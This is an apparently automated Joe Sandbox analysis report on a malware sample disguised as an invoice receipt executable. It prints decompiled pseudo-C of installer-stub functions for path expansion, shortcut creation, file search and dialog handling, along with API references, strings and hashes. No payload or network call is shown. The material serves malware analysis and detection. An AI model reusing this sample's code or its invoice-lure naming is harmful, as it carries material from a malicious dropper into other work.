Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

pzusn, xrefs: 004043DA, 004043DF, 004043EA
A, xrefs: 0040439C
C:\Users\user\AppData\Local\Temp, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$pzusn
API String ID: 2246997448-3701615307
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

0x00405aa7
0x00405aa7
0x00405aa7
0x00405aad
0x00405ab2
0x00405ac3
0x00405ac3
0x00405ace
0x00405ad0
0x00405ad5
0x00405ad8
0x00405ad9
0x00405ae0
0x00405ae2
0x00405ae8
0x00405aeb
0x00405aeb
0x00405cc0
0x00405cc0
0x00405cc4
0x00000000
0x00000000
0x00405af8
0x00405afe
0x00000000
0x00000000
0x00405b04
0x00405b05
0x00405b08
0x00405b0b
0x00405cb3
0x00405cbd
0x00405cbf
0x00405cbf
0x00405cb5
0x00405cb7
0x00405cb9
0x00405cba
0x00405cba
0x00000000
0x00405cb3
0x00405b11
0x00405b15
0x00405b1a
0x00405b29
0x00405b2c
0x00405b2e
0x00405b33
0x00405b36
0x00405b39
0x00405b3c
0x00405b3f
0x00405b42
0x00405c5d
0x00405c60
0x00405c90
0x00405c93
0x00405c98
0x00405c9c
0x00405c9c
0x00405ca1
0x00405ca2
0x00405ca7
0x00405caa
0x00405cac
0x00000000
0x00405cac
0x00405c62
0x00405c65
0x00405c7a
0x00405c81
0x00405c67
0x00405c6e
0x00405c6e
0x00405c89
0x00405c8c
0x00405c55
0x00405c56
0x00405c56
0x00000000
0x00405c8c
0x00405b4a
0x00405b4b
0x00405b51
0x00405b53
0x00405b6d
0x00405b6d
0x00405b74
0x00405b74
0x00405b7b
0x00405b7f
0x00405b7f
0x00405b80
0x00405b82
0x00405bbb
0x00405bbe
0x00405bce
0x00405bd1
0x00405bd9
0x00405bdf
0x00405bdf
0x00405c3b
0x00405c3b
0x00405c3d
0x00000000
0x00000000
0x00405be3
0x00405bea
0x00405beb
0x00405bed
0x00405c07
0x00405c15
0x00405c1b
0x00405c1d
0x00405c38
0x00405c38
0x00405c38
0x00000000
0x00405c38
0x00405c23
0x00405c2e
0x00405c34
0x00405c36
0x00000000
0x00000000
0x00000000
0x00405c36
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405c01
0x00405c03
0x00405c05
0x00000000
0x00000000
0x00000000
0x00405c05
0x00000000
0x00405c3b
0x00405bc6
0x00000000
0x00405b84
0x00405b89
0x00405b9f
0x00405ba4
0x00405ba7
0x00405c44
0x00405c44
0x00405c48
0x00405c50
0x00405c50
0x00000000
0x00405c48
0x00405bb1
0x00405c3f
0x00405c3f
0x00405c42
0x00000000
0x00000000
0x00000000
0x00405c42
0x00405b82
0x00405b55
0x00405b59
0x00000000
0x00000000
0x00405b5b
0x00405b5f
0x00000000
0x00000000
0x00405b61
0x00405b65
0x00000000
0x00405b67
0x00405b67
0x00000000
0x00405b67
0x00405b65
0x00405cca
0x00405cd4
0x00405ce0
0x00405ce0
0x00000000

APIs

GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32 ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(pzusn,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,pzusn), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
lstrcatA.KERNEL32(pzusn,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(pzusn,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

pzusn, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$pzusn
API String ID: 900638850-4179759605
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040201b
0x00402025
0x0040202e
0x00402038
0x00402041
0x0040204b
0x0040204f
0x0040204f
0x00402054
0x00402065
0x0040206d
0x0040214d
0x0040214d
0x00402154
0x00402073
0x00402073
0x00402084
0x00402088
0x0040208e
0x00402098
0x0040209a
0x004020a5
0x004020a8
0x004020b5
0x004020b7
0x004020b9
0x004020c0
0x004020c3
0x004020c3
0x004020c6
0x004020d0
0x004020d8
0x004020dd
0x004020e9
0x004020e9
0x004020ec
0x004020f5
0x004020f8
0x00402101
0x00402106
0x00402118
0x00402127
0x00402129
0x00402135
0x00402135
0x00402127
0x00402137
0x0040213d
0x0040213d
0x00402140
0x00402146
0x0040214b
0x00402160
0x00000000
0x00000000
0x00000000
0x0040214b
0x00402156
0x00402880
0x0040288c

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-501415292
Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402648
0x0040265c
0x00402667
0x00402668
0x004027a3
0x0040264a
0x0040264a
0x0040264c
0x0040264e
0x0040264e
0x00402880
0x0040288c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A

Uniqueness

Uniqueness Score: -1.00%

Function 0019DE9A, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295336351.000000000019D000.00000040.00000001.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19d000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
Instruction ID: 3d920a482423bd2af772d3b091004499e820782110dd3857b03b5778cf4f3c6f
Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
Instruction Fuzzy Hash: 6561A071F00608ABCF20DFA4C884BAEBBFAAF58710F244059F955EB390DBB59D418B55

Uniqueness

Uniqueness Score: -1.00%

Function 0019E0AE, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295336351.000000000019D000.00000040.00000001.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19d000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: 993fab63008f562eaaf9f963d7e70733158c078307234df00189045ee78204bb
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: D511A031B00109AFCF20DBA9C8888ADF7FEEF55790B5440A9F805D3214E774EE41C660

Uniqueness

Uniqueness Score: -1.00%

Function 0019E19E, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295336351.000000000019D000.00000040.00000001.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19d000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: c4b7d9015fe7769338d93d8712b0c093c34cb892820f6461db8ff90b0973e7b3
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: 5EE09A357606499FCB14DBA8C881D25B3F8EB08320B1042A0FC25CB3A0EB34EE40DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0019E1DC, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295336351.000000000019D000.00000040.00000001.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19d000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 49fd1832a4064ef485bb687d4cf08d4cf9072805308969cacca29883e6072144
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: 10E08C323115108BCB20DB99C484C52F7E9EB8C3B171A486AFC5AD3711C370FC01C650

Uniqueness

Uniqueness Score: -1.00%

Function 0019E15F, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295336351.000000000019D000.00000040.00000001.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19d000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00403964, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
